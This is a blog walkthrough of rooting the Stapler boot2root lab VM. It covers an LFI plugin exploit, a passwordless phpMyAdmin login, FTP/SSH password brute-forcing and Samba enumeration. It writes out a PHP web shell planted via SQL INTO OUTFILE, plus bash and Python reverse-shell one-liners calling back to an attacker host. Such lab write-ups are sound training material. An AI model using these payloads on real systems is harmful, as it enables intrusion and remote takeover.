Stapler: 1 write up

Foreword

Today we are going to get root in stapler, a VM created by g0tmi1k. I have tried really hard on this VM, due to multiple careless mistakes (e.g. overlooked some message of scanning) and almost got lost in a bunch of people names during “dumpster diving” in the VM. But it is REALLY fun. I have tried lots of approaches to pwn it.


Method 1 – web app exploiting

Recon

nmap

Try to ssh, ftp and that strange port 666 will give you a bunch of people names, we will see them again later. Scanning port 80 turns out being useless, but soon we found out that port 12380 is another web service to have fun.

By the way, netcat to port 666 will give you a .zip file and a image after you unzip it. Also, you will get this message :

message.png

And this (real?) message after you call strings on it :

cookie.png

Strange enough. I don’t know how to use it in exploitation.

Anyway, let’s get back to an successful approach I have tried.

nikto.png

Nikto on port 12380 tells us that SSL is used and there are 3 interesting directory: /admin112233, /blogblog/ and /phpmyadmin/. We found that /blogblog/ is running wordpress. After playing with it for a while, we found this plugin :

video.png

Let’s look for some public exploits for this plugin “advanced-video”. Luckily we have found one :

searchsploit

Exploit

It is a LFI exploits. Copy the .py file to our working directory and edit the url to https://<Stapler’s IP>:12380/blogblog , then go to /wp-content/uploads, we can see some files is included :

files.png

Naming by random number. Well, we need to check them one by one, in order to see if there are any interesting file. Finally we found that a file was containing some MYSQL config. And luckily, the root has no password! So let’s login to https://<Stapler’s IP>:12380/phpmyadmin and login with “root” and no password.

Now we can have some backdoor uploaded to Stapler here by SQL command :

SELECT "<?php system($_GET['cmd']);?>" INTO OUTFILE "/var/www/https/blogblog/wp-content/uploads/cmd.php"

(You can type this command in the textbox appears after clicking “database” on the top of the homepage of phpmyadmin)

This will create a php file which reads an input called ‘cmd’ and executes it in Stapler’s shell, in the directory shown above. That means you can run any linux commands you want through this variable ‘cmd’.  In practice, we mostly use it in this way:

https://<Stapler's IP>:12380/wp-content/uploads/cmd.php?cmd=bash -i >& /dev/tcp/<kali's IP>/443/ 0>&1

and using netcat to listen on port 443 to get a bash. But this does not work here since we have no permission to call “bash”. But luckily, we have an alternative:

https://<Stapler's IP>:12380/wp-content/uploads/cmd.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<kali's IP>",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Credit to pentestmonkey . So we have a reverse shell now:

shell

We then found that there was an user called “peter” and a file called “sudo_as_admin_successful”. Interesting, but we have no permission to touch those things belong to him. After doing some further searching, we discovered that there was an user called JKanode doing something special:

Jkanode.png

So let’s check out what commands have been input by this user. Navigate to /home/JKanode and type cat .bash_history , we got the password of JKanode and that of  peter!

ssh_pass

So we can now ssh to Stapler with peter’s password. We can use sudo to change root’s password to anything as we wish! Done! Below is the flag:

flag


 

Method 2 – FTP

Recon

Since ftp is running on Stapler, so why don’t we try to login as anonymous? We have found a file called note in the anonymous account :

ftp

So what is this note for?

elly

Exploit

Update the payload? There must be something to discover in Elly’s ftp account. So let’s see if we can brute-force into it:

elly_login

Lucky for us! Elly is using a weak password !

*Remarks : -e nsr is used for checking if the users are using null password, password same as username or reverse of username as password.

After fingertip searching in Elly’s ftp account, we have found a file called passwd which seems to be a copy of /etc/passwd. Using cut -d ‘:’ -f1 > pass.txt to put all the usernames into a file named as pass.txt, we can again brute-force ssh using this name list :

ssh_acc.png

Once we have access, we can use the same way as above the get the password of peter and do anything as root. Done.


 

Method 3 – Samba

Recon

Since samba is running on port 139, we can use enum4linux to enumerate usernames :

smb.png

Again, you can try to brute-force these usernames.


 

Afterword

Quite a long journey (comparing with the previous boot2root VM’s I have tackled – Kioptrix series). Did a lot of enumeration and searching. Tried hard, tried harder. Quite a great experience.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s